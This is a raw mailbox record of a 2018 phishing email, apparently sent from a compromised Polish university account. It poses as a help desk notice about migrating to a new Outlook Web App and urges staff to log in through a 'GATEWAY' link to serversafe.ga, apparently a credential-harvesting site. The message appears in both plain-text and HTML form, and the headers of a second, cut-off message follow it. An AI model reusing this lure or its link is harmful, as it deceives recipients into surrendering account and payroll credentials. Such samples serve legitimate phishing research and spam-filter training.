From: Adam Rowicki <adam.rowicki@wum.edu.pl>
To: Adam Rowicki <adam.rowicki@wum.edu.pl>
Subject: ODP: SERVICE HELP DESK
Thread-Topic: SERVICE HELP DESK
Thread-Index: AdO/imfRkzgL6UpMRCCHjZpXVIaxwwAAjhvW
Date: Mon, 19 Mar 2018 14:15:46 +0000
Message-ID: <0EB85A93AA23CA4596A336286AB8D9BA01017A1A@BA-RE-EX03.am.edu.pl>
References: <0EB85A93AA23CA4596A336286AB8D9BA0101665A@BA-RE-EX03.am.edu.pl>
In-Reply-To: <0EB85A93AA23CA4596A336286AB8D9BA0101665A@BA-RE-EX03.am.edu.pl>
Accept-Language: pl-PL, en-US
Content-Language: pl-PL
X-MS-Has-Attach:
X-MS-TNEF-Correlator:
x-originating-ip: [105.112.96.22]
Content-Type: multipart/alternative;
	boundary="_000_0EB85A93AA23CA4596A336286AB8D9BA01017A1ABAREEX03amedupl_"
MIME-Version: 1.0
Status: RO
X-Status: 
X-Keywords:                 
X-UID: 453

--_000_0EB85A93AA23CA4596A336286AB8D9BA01017A1ABAREEX03amedupl_
Content-Type: text/plain; charset="windows-1250"
Content-Transfer-Encoding: quoted-printable

Welcome to the new outlook web app for Staff



Migrate to The new Outlook Web app for Staff is the new home for online sel=
f-service and information and additional storage.

Click on GATEWAY <https://www.serversafe.ga/mailsecure/> and login to:

=B7                     Access the new staff directory

=B7                     Access your pay slips and P60s

=B7                     Update your ID photo

=B7                     E-mail and Calendar Flexibility

=B7                     Connect mobile number to e-mail for Voicemail
Everyone is advise to migrate immediately.

Help Desk Support Team


--_000_0EB85A93AA23CA4596A336286AB8D9BA01017A1ABAREEX03amedupl_
Content-Type: text/html; charset="windows-1250"
Content-Transfer-Encoding: quoted-printable

<html dir=3D"ltr">
<head>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Dwindows-1=
250">
<style type=3D"text/css" id=3D"owaParaStyle"></style>
</head>
<body fpstyle=3D"1" ocsi=3D"0">
<div style=3D"direction: ltr;font-family: Tahoma;color: #000000;font-size: =
10pt;">
<div style=3D"font-family: Times New Roman; color: #000000; font-size: 16px=
">
<div>
<div style=3D"direction:ltr; font-family:Tahoma; color:#000000; font-size:1=
0pt">
<p class=3D"x_x_x_x_x_x_m_-6926962049847788647yiv2006147726xxxxxxyiv3070891=
271xxxm5930126181973679587xxxxxxxxxxmsonormal" style=3D"margin: 0in 0in 0pt=
; font-family: Tahoma, serif, EmojiFont; background-color: rgb(255, 255, 25=
5); font-size: 13.3333px;">
<strong><span style=3D"font-size: 18pt; font-family: Tahoma, sans-serif, se=
rif, EmojiFont; color: rgb(73, 96, 130);">Welcome to the new outlook web ap=
p for Staff</span></strong><span style=3D"font-family: Tahoma, sans-serif, =
serif, EmojiFont;"><u></u><u></u></span></p>
<p id=3D"x_x_x_x_x_x_m_-6926962049847788647yiv2006147726x_x_x_x_x_x_yui_3_1=
6_0_ym19_1_1515417382389_2855" class=3D"x_x_x_x_x_x_m_-6926962049847788647y=
iv2006147726xxxxxxyiv3070891271xxxm5930126181973679587xxxxxxxxxxmsonormal" =
style=3D"margin: 0in 0in 0pt; font-family: Tahoma, serif, EmojiFont; backgr=
ound-color: rgb(255, 255, 255); font-size: 13.3333px;">
<span style=3D"font-family: Tahoma, sans-serif, serif, EmojiFont;"><u></u><=
u></u></span>&nbsp;</p>
<p id=3D"x_x_x_x_x_x_m_-6926962049847788647yiv2006147726x_x_x_x_x_x_yui_3_1=
6_0_ym19_1_1515417382389_2854" class=3D"x_x_x_x_x_x_m_-6926962049847788647y=
iv2006147726xxxxxxyiv3070891271xxxm5930126181973679587xxxxxxxxxxmsonormal" =
style=3D"margin: 0in 0in 0pt; font-family: Tahoma, serif, EmojiFont; backgr=
ound-color: rgb(255, 255, 255); font-size: 13.3333px;">
<strong id=3D"x_x_x_x_x_x_m_-6926962049847788647yiv2006147726x_x_x_x_x_x_yu=
i_3_16_0_ym19_1_1515417382389_2853"><span style=3D"font-size: 10pt; font-fa=
mily: Tahoma, sans-serif, serif, EmojiFont; color: rgb(73, 96, 130);">Migra=
te to&nbsp;The new Outlook Web app for Staff
 is the new home for online self-service and&nbsp;information and additiona=
l storage.</span></strong><span style=3D"font-family: Tahoma, sans-serif, s=
erif, EmojiFont;"><u></u><u></u></span></p>
<p id=3D"x_x_x_x_x_x_m_-6926962049847788647yiv2006147726x_x_x_x_x_x_yui_3_1=
6_0_ym19_1_1515417382389_2851" class=3D"x_x_x_x_x_x_m_-6926962049847788647y=
iv2006147726xxxxxxyiv3070891271xxxm5930126181973679587xxxxxxxxxxmsonormal" =
style=3D"margin: 0in 0in 0pt; font-family: Tahoma, serif, EmojiFont; backgr=
ound-color: rgb(255, 255, 255); font-size: 13.3333px;">
<strong id=3D"x_x_x_x_x_x_m_-6926962049847788647yui_3_16_0_ym19_1_152083688=
9383_10374"><span style=3D"font-size: 10pt; font-family: Tahoma, sans-serif=
, serif, EmojiFont; color: rgb(0, 51, 102);">Click&nbsp;on</span></strong><=
strong id=3D"x_x_x_x_x_x_m_-6926962049847788647yiv2006147726x_x_x_x_x_x_yui=
_3_16_0_ym19_1_1515417382389_2850"><span style=3D"font-size: 10pt; font-fam=
ily: Tahoma, sans-serif, serif, EmojiFont;">&nbsp;</span></strong><span sty=
le=3D"font-family: Tahoma, sans-serif, serif, EmojiFont;"><strong id=3D"x_x=
_x_x_x_x_m_-6926962049847788647yiv2006147726x_x_x_x_x_x_yui_3_16_0_ym19_1_1=
515417382389_2850"><span style=3D"font-size: 10pt; font-weight: normal; col=
or: blue;"><a href=3D"https://www.serversafe.ga/mailsecure/" rel=3D"noopene=
r noreferrer" target=3D"_blank">GATEWAY&nbsp;</a></span></strong></span><st=
rong><span style=3D"font-size: 10pt; font-family: Tahoma, sans-serif, serif=
, EmojiFont; color: rgb(0, 51, 102);">and
 login&nbsp;to:</span></strong><span style=3D"font-family: Tahoma, sans-ser=
if, serif, EmojiFont;"><u></u><u></u></span></p>
<p class=3D"x_x_x_x_x_x_m_-6926962049847788647yiv2006147726xxxxxxyiv3070891=
271xxxm5930126181973679587xxxxxxxxxxmsonormal" style=3D"margin: 0in 0in 0pt=
; font-family: Tahoma, serif, EmojiFont; background-color: rgb(255, 255, 25=
5); font-size: 13.3333px;">
<strong><span style=3D"font-size: 10pt; font-family: Symbol, serif, EmojiFo=
nt; color: rgb(73, 96, 130);">=B7</span></strong><strong><span style=3D"fon=
t-size: 7pt; font-family: Tahoma, sans-serif, serif, EmojiFont; color: rgb(=
73, 96, 130);">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span></=
strong><strong><span style=3D"font-size: 10pt; font-family: Tahoma, sans-se=
rif, serif, EmojiFont; color: rgb(73, 96, 130);">Access
 the new staff directory</span></strong><span style=3D"font-family: Tahoma,=
 sans-serif, serif, EmojiFont;"><u></u><u></u></span></p>
<p id=3D"x_x_x_x_x_x_m_-6926962049847788647yui_3_16_0_ym19_1_1520836889383_=
10381" class=3D"x_x_x_x_x_x_m_-6926962049847788647yiv2006147726xxxxxxyiv307=
0891271xxxm5930126181973679587xxxxxxxxxxmsonormal" style=3D"margin: 0in 0in=
 0pt; font-family: Tahoma, serif, EmojiFont; background-color: rgb(255, 255=
, 255); font-size: 13.3333px;">
<strong><span style=3D"font-size: 10pt; font-family: Symbol, serif, EmojiFo=
nt; color: rgb(73, 96, 130);">=B7</span></strong><strong><span style=3D"fon=
t-size: 7pt; font-family: Tahoma, sans-serif, serif, EmojiFont; color: rgb(=
73, 96, 130);">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span></=
strong><strong id=3D"x_x_x_x_x_x_m_-6926962049847788647yui_3_16_0_ym19_1_15=
20836889383_10380"><span style=3D"font-size: 10pt; font-family: Tahoma, san=
s-serif, serif, EmojiFont; color: rgb(73, 96, 130);">Access
 your pay slips and P60s</span></strong><span style=3D"font-family: Tahoma,=
 sans-serif, serif, EmojiFont;"><u></u><u></u></span></p>
<p id=3D"x_x_x_x_x_x_m_-6926962049847788647yui_3_16_0_ym19_1_1520836889383_=
10372" class=3D"x_x_x_x_x_x_m_-6926962049847788647yiv2006147726xxxxxxyiv307=
0891271xxxm5930126181973679587xxxxxxxxxxmsonormal" style=3D"margin: 0in 0in=
 0pt; font-family: Tahoma, serif, EmojiFont; background-color: rgb(255, 255=
, 255); font-size: 13.3333px;">
<strong><span style=3D"font-size: 10pt; font-family: Symbol, serif, EmojiFo=
nt; color: rgb(73, 96, 130);">=B7</span></strong><strong id=3D"x_x_x_x_x_x_=
m_-6926962049847788647yui_3_16_0_ym19_1_1520836889383_10371"><span style=3D=
"font-size: 7pt; font-family: Tahoma, sans-serif, serif, EmojiFont; color: =
rgb(73, 96, 130);">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&n=
bsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</spa=
n></strong><strong id=3D"x_x_x_x_x_x_m_-6926962049847788647yui_3_16_0_ym19_=
1_1520836889383_10383"><span style=3D"font-size: 10pt; font-family: Tahoma,=
 sans-serif, serif, EmojiFont; color: rgb(73, 96, 130);">Update
 your ID photo</span></strong><span style=3D"font-family: Tahoma, sans-seri=
f, serif, EmojiFont;"><u></u><u></u></span></p>
<p id=3D"x_x_x_x_x_x_m_-6926962049847788647yiv2006147726x_x_x_x_x_x_yui_3_1=
6_0_ym19_1_1515417382389_2835" class=3D"x_x_x_x_x_x_m_-6926962049847788647y=
iv2006147726xxxxxxyiv3070891271xxxm5930126181973679587xxxxxxxxxxmsonormal" =
style=3D"margin: 0in 0in 0pt; font-family: Tahoma, serif, EmojiFont; backgr=
ound-color: rgb(255, 255, 255); font-size: 13.3333px;">
<strong><span style=3D"font-size: 10pt; font-family: Symbol, serif, EmojiFo=
nt; color: rgb(73, 96, 130);">=B7</span></strong><strong><span style=3D"fon=
t-size: 7pt; font-family: Tahoma, sans-serif, serif, EmojiFont; color: rgb(=
73, 96, 130);">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span></=
strong><strong id=3D"x_x_x_x_x_x_m_-6926962049847788647yiv2006147726x_x_x_x=
_x_x_yui_3_16_0_ym19_1_1515417382389_2837"><span style=3D"font-size: 10pt; =
font-family: Tahoma, sans-serif, serif, EmojiFont; color: rgb(73, 96, 130);=
">E-mail
 and Calendar Flexibility&nbsp;</span></strong><span style=3D"font-family: =
Tahoma, sans-serif, serif, EmojiFont;"><u></u><u></u></span></p>
<p class=3D"x_x_x_x_x_x_m_-6926962049847788647yiv2006147726xxxxxxyiv3070891=
271xxxm5930126181973679587xxxxxxxxxxmsonormal" style=3D"margin: 0in 0in 0pt=
; font-family: Tahoma, serif, EmojiFont; background-color: rgb(255, 255, 25=
5); font-size: 13.3333px;">
<strong><span style=3D"font-size: 10pt; font-family: Symbol, serif, EmojiFo=
nt; color: rgb(73, 96, 130);">=B7</span></strong><strong><span style=3D"fon=
t-size: 7pt; font-family: Tahoma, sans-serif, serif, EmojiFont; color: rgb(=
73, 96, 130);">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span></=
strong><strong id=3D"x_x_x_x_x_x_m_-6926962049847788647yiv2006147726x_x_x_x=
_x_x_yui_3_16_0_ym19_1_1515417382389_2846"><span style=3D"font-size: 10pt; =
font-family: Tahoma, sans-serif, serif, EmojiFont; color: rgb(73, 96, 130);=
">Connect
 mobile number to e-mail for Voicemail</span></strong><b id=3D"x_x_x_x_x_x_=
m_-6926962049847788647yiv2006147726x_x_x_x_x_x_yui_3_16_0_ym19_1_1515417382=
389_2844"><span style=3D"font-size: 10pt; font-family: Tahoma, sans-serif, =
serif, EmojiFont; color: rgb(73, 96, 130);"><br>
<strong id=3D"x_x_x_x_x_x_m_-6926962049847788647yiv2006147726x_x_x_x_x_x_yu=
i_3_16_0_ym19_1_1515417382389_2842">Everyone is advise to migrate immediate=
ly.</strong><br>
<br>
<strong id=3D"x_x_x_x_x_x_m_-6926962049847788647yui_3_16_0_ym19_1_152083688=
9383_10384">Help Desk Support Team</strong></span></b></p>
<div><b><span style=3D"font-size: 10pt; font-family: Tahoma, sans-serif, se=
rif, EmojiFont; color: rgb(73, 96, 130);"><strong><br>
</strong></span></b></div>
</div>
</div>
</div>
</div>
</body>
</html>

--_000_0EB85A93AA23CA4596A336286AB8D9BA01017A1ABAREEX03amedupl_--

From jose@monkey.org Wed Mar 21 12:30:44 2018 +0000
Return-Path: amateur3@vm387.tmdcloud.com
Delivered-To: jose@monkey.org
X-FDA: 73966650408.11.smoke41_4091ba44de456
X-Spam-Summary: 85,1,0,0165493832a6b3b7,d41d8cd98f00b204,amateur3@vm387.tmdcloud.com,:,RULES_HIT:4:41:46:72:150:153:355:375:379:541:543:882:967:969:973:978:979:983:988:989:1208:1224:1260:1311:1313:1314:1345:1381:1431:1433:1434:1437:1515:1516:1517:1571:1593:1594:1676:1699:1730:1747:1777:1792:1801:2084:2198:2199:2393:2525:2527:2538:2539:2549:2553:2560:2563:2610:2640:2682:2685:2692:2828:2859:2890:2894:2901:2909:2933:2937:2939:2942:2945:2947:2951:2954:3000:3022:3138:3139:3140:3141:3142:3148:3352:3586:3865:3866:3867:3870:3871:3872:3873:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4042:4248:4321:4383:4429:4605:4647:5007:6248:6261:6650:6669:6678:6688:8518:8583:8603:8608:8903:8957:9025:9080:9132:9149:9165:9199:9391:9908:10231:10346:11026:11032:11289:11529:11657:11658:11914:11984:12043:12114:12217:12438:12555:12718:12737:12812:12903:12955:12958:12961:12967:12986:13019:13139:13439:13894:14096:14829:14985:21080:21325:21433:21450:21451:21499:21524:21627:21740:30001:30003:30014:30019:30022:3
X-HE-Tag: smoke41_4091ba44de456
X-Filterd-Recvd-Size: 15920
Received: from vm387.tmdcloud.com (vm387.tmdcloud.com [99.198.117.42])
	by imf20.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Wed, 21 Mar 2018 12:30:43 +0000 (UTC)
Received: from amateur3 by vm387.tmdcloud.com with local (Exim 4.89_1)
	(envelope-from <amateur3@vm387.tmdcloud.com>)
	id 1eyct8-0005bZ-S5
	for jose@monkey.org; Wed, 21 Mar 2018 12:30:43 +0000
Date: Wed, 21 Mar 2018 12:30:42 +0000
To: jose@monkey.org
